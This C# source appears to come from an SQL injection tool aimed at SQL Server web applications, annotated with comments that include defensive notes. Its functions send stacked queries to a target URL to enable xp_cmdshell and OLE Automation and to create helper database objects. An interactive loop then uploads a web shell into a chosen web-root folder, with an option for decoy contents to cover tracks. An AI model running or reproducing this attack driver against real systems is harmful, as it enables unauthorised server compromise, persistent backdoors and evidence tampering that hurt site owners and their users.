/// <summary>
/// Builds a stacked-query request from <c>QueriesDB.EnableXPCMDShell</c> for
/// <paramref name="url"/>, sends it through <c>ResponseFilter.confirmResponce</c>
/// and reports the outcome.
/// </summary>
/// <remarks>
/// The query text lives in <c>QueriesDB</c> and is not visible here; going by the
/// constant name and the log messages it presumably switches on the SQL Server
/// <c>xp_cmdshell</c> option (confirm against QueriesDB).
/// The literal <c>'rummykhan'</c> (quotes included) in the built request is swapped
/// for <c>QueriesDB.Replacement</c>, the same marker later handed to
/// <c>confirmResponce</c>; presumably the marker is expected back in the response.
/// Unlike the create* helpers in this file, nothing here catches exceptions, so any
/// exception raised by the helpers propagates to the caller.
/// Defensive note: a request like this only takes effect when the application
/// concatenates request input into SQL and the database login may change server
/// configuration; parameterized queries and a least-privileged login remove both
/// preconditions, and server configuration changes are worth alerting on.
/// </remarks>
/// <param name="url">Target URL passed unchanged to <c>QueryCrafter.constructStackedQuery</c>.</param>
/// <returns><c>true</c> when <c>confirmResponce</c> accepts the response, otherwise <c>false</c>.</returns>
public static bool enableXPCMDShell(string url)
{
    string stackedRequest = QueryCrafter
        .constructStackedQuery(url, QueriesDB.EnableXPCMDShell)
        .Replace("'rummykhan'", QueriesDB.Replacement);

    bool confirmed = ResponseFilter.confirmResponce(stackedRequest, QueriesDB.Replacement);
    if (!confirmed)
    {
        Log.logError("Failed to Enable XP CMD Shell..");
        return false;
    }

    Log.logOutput("XP CMD Shell Enabled..");
    return true;
}
/// <summary>
/// Builds a stacked-query request from <c>QueriesDB.EnableOLEAutomation</c> for
/// <paramref name="url"/>, sends it through <c>ResponseFilter.confirmResponce</c>
/// and reports the outcome.
/// </summary>
/// <remarks>
/// The query text is defined in <c>QueriesDB</c> and is not visible here; the
/// constant name and log messages suggest it enables the SQL Server
/// "Ole Automation Procedures" option (confirm against QueriesDB).
/// The quoted placeholder <c>'rummykhan'</c> is replaced with
/// <c>QueriesDB.Replacement</c> before the request is sent, and the same value is
/// passed to <c>confirmResponce</c> as the thing to look for.
/// No exception handling is done in this method; failures in the helpers surface
/// to the caller.
/// Defensive note: the precondition is the same as for any stacked statement:
/// request input reaching the SQL text, plus a login privileged enough to change
/// server options. Parameterization and least privilege are the mitigations, and a
/// change to this option is a useful audit signal.
/// </remarks>
/// <param name="url">Target URL passed unchanged to <c>QueryCrafter.constructStackedQuery</c>.</param>
/// <returns><c>true</c> when <c>confirmResponce</c> accepts the response, otherwise <c>false</c>.</returns>
public static bool enableOLEAutomation(string url)
{
    string stackedRequest = QueryCrafter
        .constructStackedQuery(url, QueriesDB.EnableOLEAutomation)
        .Replace("'rummykhan'", QueriesDB.Replacement);

    bool confirmed = ResponseFilter.confirmResponce(stackedRequest, QueriesDB.Replacement);
    if (!confirmed)
    {
        Log.logError("Failed to Enable OLE Automation Procedures..");
        return false;
    }

    Log.logOutput("OLE Automation Enabled..");
    return true;
}
/// <summary>
/// Sends the request built from <c>QueriesDB.UploadFileProcQuery</c> and then checks,
/// with a second request, that the expected database object is reported back.
/// </summary>
/// <remarks>
/// Two steps, both visible below:
/// 1. the creation request is wrapped by <c>constructURLForConfirmation</c> and must
///    pass <c>ResponseFilter.confirmResponce</c>;
/// 2. a lookup request built from <c>QueriesDB.ConfirmFcUkProcQuery</c> is fetched and
///    the value extracted by <c>getPureResponseWithLastIndex</c> must equal "FcUk".
/// The query bodies are in <c>QueriesDB</c> and are not visible here.
/// Every exception is caught, its message logged, and <c>false</c> returned.
/// Defensive note: step 1 leaves a persistent object in the database until it is
/// dropped, so unexpected procedure creation by the web application's login is a
/// detectable event; denying that login DDL rights blocks this step outright.
/// </remarks>
/// <param name="url">Target URL handed to the <c>QueryCrafter</c> builders.</param>
/// <returns><c>true</c> only when both steps succeed; <c>false</c> on any failure or exception.</returns>
static bool createProcFcUk(string url)
{
    try
    {
        var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
        creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

        // Step 1: the creation request itself has to be confirmed.
        if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
        {
            Log.logError("Erroneous response from the server..");
            Log.logError("Procedure to Upload Shell cannot be created..");
            return false;
        }

        // Step 2: look the object up again and compare the extracted name.
        var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
        var response = HTTPMethods.getResponse(lookupUrl);

        if (response == null)
        {
            // The "2" prefix marks the no-response branch in the log.
            Log.logError("2 Procedure to Upload Shell cannot be created..");
            return false;
        }

        if (ResponseFilter.getPureResponseWithLastIndex(response) != "FcUk")
        {
            // The "1" prefix marks the name-mismatch branch in the log.
            Log.logError("1 Procedure to Upload Shell cannot be created..");
            return false;
        }

        Log.logOutput("Procedure to Upload Shell is created..");
        return true;
    }
    catch (Exception ex)
    {
        Log.logError(ex.Message);
        return false;
    }
}
/// <summary>
/// Sends the request built from <c>QueriesDB.DirListingFuncQuery</c> and then checks,
/// with a second request, that the expected database object is reported back.
/// </summary>
/// <remarks>
/// Same two-step shape as the procedure-creation helper in this file:
/// 1. the creation request is wrapped by <c>constructURLForConfirmation</c> and must
///    pass <c>ResponseFilter.confirmResponce</c>;
/// 2. a lookup request built from <c>QueriesDB.ConfirmDirFuncQuery</c> is fetched and
///    the value extracted by <c>getPureResponseWithLastIndex</c> must equal "Dir".
/// The query bodies are in <c>QueriesDB</c> and are not visible here; per the log
/// text the object is a function that returns a directory listing.
/// Every exception is caught, its message logged, and <c>false</c> returned.
/// Defensive note: the created function stays in the database until something
/// drops it, so object-creation auditing and a login without DDL rights are the
/// relevant controls.
/// </remarks>
/// <param name="url">Target URL handed to the <c>QueryCrafter</c> builders.</param>
/// <returns><c>true</c> only when both steps succeed; <c>false</c> on any failure or exception.</returns>
static bool createFuncDir(string url)
{
    try
    {
        var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
        creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

        // Step 1: the creation request itself has to be confirmed.
        if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
        {
            Log.logError("Erroneous response from the server..");
            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }

        // Step 2: look the object up again and compare the extracted name.
        var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
        var response = HTTPMethods.getResponse(lookupUrl);

        // Both failure branches log the same message, as in the original.
        if (response == null)
        {
            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }

        if (ResponseFilter.getPureResponseWithLastIndex(response) != "Dir")
        {
            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }

        Log.logOutput("Function to get Directory Listing is created..");
        return true;
    }
    catch (Exception ex)
    {
        Log.logError(ex.Message);
        return false;
    }
}
/// <summary>
/// Interactive driver: confirms the target responds, creates the helper procedure,
/// then repeatedly prompts for a folder and file name and issues a file-write
/// request until the operator enters "x".
/// </summary>
/// <remarks>
/// Flow, as visible in the code:
/// - a confirmation request must pass <c>ResponseFilter.confirmResponce</c>, otherwise
///   "No response from the server.." is logged and nothing else happens;
/// - if <c>createProcFcUk</c> succeeds, the prompt loop runs;
/// - <c>dropObject(url, QueriesDB.DropFcUkProcQuery)</c> is called afterwards whether
///   or not the procedure was created.
/// The operator-supplied path and file name are substituted into the query template
/// with plain <c>Replace</c>; no escaping or validation is applied to them here.
/// NOTE(review): when the write request is not confirmed, the loop continues without
/// logging anything for that attempt.
/// Defensive note: each stage leaves evidence a defender can use: the procedure
/// create/drop pair in the database, and a new file under the web root. File
/// integrity monitoring on served directories and denying the database service
/// account write access to them address the last stage. The "f" choice selects
/// <c>QueriesDB.FileUploadingQueryFAKE</c>, which the prompt describes as different
/// file contents; the template is not visible here.
/// </remarks>
/// <param name="url">Target URL handed to the <c>QueryCrafter</c> builders and helper calls.</param>
public static void Spawn(string url)
{
    Log.logNotification("Confirming Web Response..");
    var probeUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

    if (!ResponseFilter.confirmResponce(probeUrl, QueriesDB.Replacement))
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");

    if (createProcFcUk(url))
    {
        while (true)
        {
            string RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
            if (RootPath == "x")
            {
                break;
            }

            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
            string contentChoice = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

            // Anything other than "f" falls through to the REAL template.
            string UrlForUploading;
            if (contentChoice != "f")
            {
                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
            }
            else
            {
                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
            }

            // Placeholders are filled in the same order as before: path, file name, marker.
            UrlForUploading = UrlForUploading
                .Replace("[PATH]", RootPath)
                .Replace("[FILENAME]", fileName)
                .Replace("rummykhan", QueriesDB.Replacement);

            string targetFile = RootPath + fileName;
            Log.logNotification("Uploading shell to " + targetFile);

            if (!ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
            {
                // No message is logged for an unconfirmed request; prompt again.
                continue;
            }

            Log.logNotification("Confirming File Upload..");
            if (confirmFileUpload(url, targetFile))
            {
                Log.logOutput("Shell uploaded successfully to : " + targetFile);
            }
            else
            {
                Log.logError("Fail to upload file..");
            }
        }
    }

    // Runs even when createProcFcUk returned false.
    dropObject(url, QueriesDB.DropFcUkProcQuery);
}